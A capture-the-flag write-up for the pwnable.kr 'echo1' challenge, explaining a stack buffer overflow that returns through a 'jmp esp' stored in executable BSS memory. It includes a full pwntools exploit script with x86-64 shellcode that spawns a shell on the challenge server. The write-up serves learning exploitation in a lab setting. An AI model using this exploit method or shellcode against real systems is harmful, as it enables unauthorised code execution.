33 - echo1

The Challenge

Pwn this echo service.

download : http://pwnable.kr/bin/echo1

Running at : nc pwnable.kr 9010

The Solution

By running the binary we learned that:

We can input a name
Three options are given to us:
- only the first option is implemented, and it's named bof [lol]
We can exit the program and then decline. This behavior is more relevant to echo2, but if we exit after declining we get a nice print of the memory mapping. It teaches us that ASLR is turned on.

After further debugging we learned that:

No other protection is turned on
There is no overflow in the name input. The first four characters are stored in a variable named "id" in the BSS section. This section isn't affected by ASLR, and in this binary, it is executable too!
Not very surprising, we can BOF in the "bof" input

The attack becomes clear now:

The buffer overflow will be made of a buffer + address of "id" + shellcode
"id" would contain 'jmp esp', thus redirect us to the shellcode

#!/usr/bin/python3

from pwn import *

offset = b'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ'
jmp_address = p64(0x6020a0)
shellcode = b'\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05'

p = remote('pwnable.kr', 9010)
p.sendline(b'\xFF\xE4') # jmp esp
p.sendline(b'1')
p.sendline(offset + jmp_address + shellcode)
p.recvrepeat(1)
p.interactive()

Previous21 - horcruxes Next34 - echo2

Last updated 3 years ago